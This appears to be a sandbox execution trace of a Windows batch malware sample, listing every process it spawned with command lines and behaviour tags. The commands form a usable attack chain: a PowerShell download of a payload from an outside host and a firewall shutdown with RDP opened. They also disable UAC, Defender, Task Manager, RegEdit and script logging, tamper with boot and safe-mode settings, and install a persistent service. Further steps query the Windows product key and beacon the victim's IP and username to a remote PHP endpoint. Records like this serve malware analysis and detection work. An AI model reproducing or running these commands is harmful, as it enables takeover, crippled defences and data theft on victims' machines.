"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4324

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Expand-Archive -Path 'BonziBuddy432.exe' -DestinationPath '.'"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bonzi.link/Bon.zip', 'Bon.zip')"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:3388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:4476

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4220

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:4436

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:3128

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:3024

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
PID:4228

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:3848

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:4852

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:1708

C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:988

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:5088

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:868

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:4632

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:1484

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:4892

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:4400

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:4840

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:2864

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3656

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:4940

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:3460

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:3960

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:2236

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3244

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4708

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3328

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:3304

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:2308

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:3620

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:3896

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:1972

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:1620

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:4648

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:1416

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:4512

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:1488

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:2120

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:2796

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:4432

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:4608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.95
2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
3⤵
PID:1220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
3⤵
PID:1772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
3⤵
PID:1648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
3⤵
PID:3176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
3⤵
PID:3096

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
3⤵
PID:4136

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
3⤵
PID:1416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
3⤵
PID:1016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
3⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
3⤵
PID:3120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
3⤵
PID:988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
3⤵
PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
3⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:4132

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
2⤵
PID:2628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
3⤵
PID:2716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gsagmhcq\admin
2⤵
PID:4684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
3⤵
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:3448

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:2020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:868

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3876

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:2152

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:4364

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:3212

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1704

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:3876

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:2604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:2212

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5284

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
2⤵
PID:4956

C:\Windows\system32\reg.exe
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
3⤵
PID:5312

C:\Windows\system32\find.exe
find "BackupProductKeyDefault"
3⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=
2⤵
PID:5484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
3⤵
PID:5428

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5444

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5588

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5500

C:\Windows\system32\timeout.exe
timeout /t 300 /nobreak
2⤵
- Delays execution with timeout.exe
PID:5644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat
1⤵
- Modifies data under HKEY_USERS
PID:4364

C:\Windows\system32\net.exe
net session
2⤵
PID:3664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:5208

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5224

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5272

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5328

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5440

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
2⤵
- Modifies Windows Firewall
PID:5492

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
2⤵
- Modifies Windows Firewall
PID:5560

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
2⤵
- Modifies Windows Firewall
PID:5624

C:\Windows\system32\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5688

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:5792

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2⤵
PID:5872

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
2⤵
PID:5924

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:5980

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:6036

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:6088

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:6140

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:5132

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:5252

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
- Modifies data under HKEY_USERS
PID:5272

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:5384

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:5468

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:5552

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5604

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:5672

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:5640

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:1984

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4500

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:3108

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5860

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5892

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5880

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:5948

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:5984

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:6048

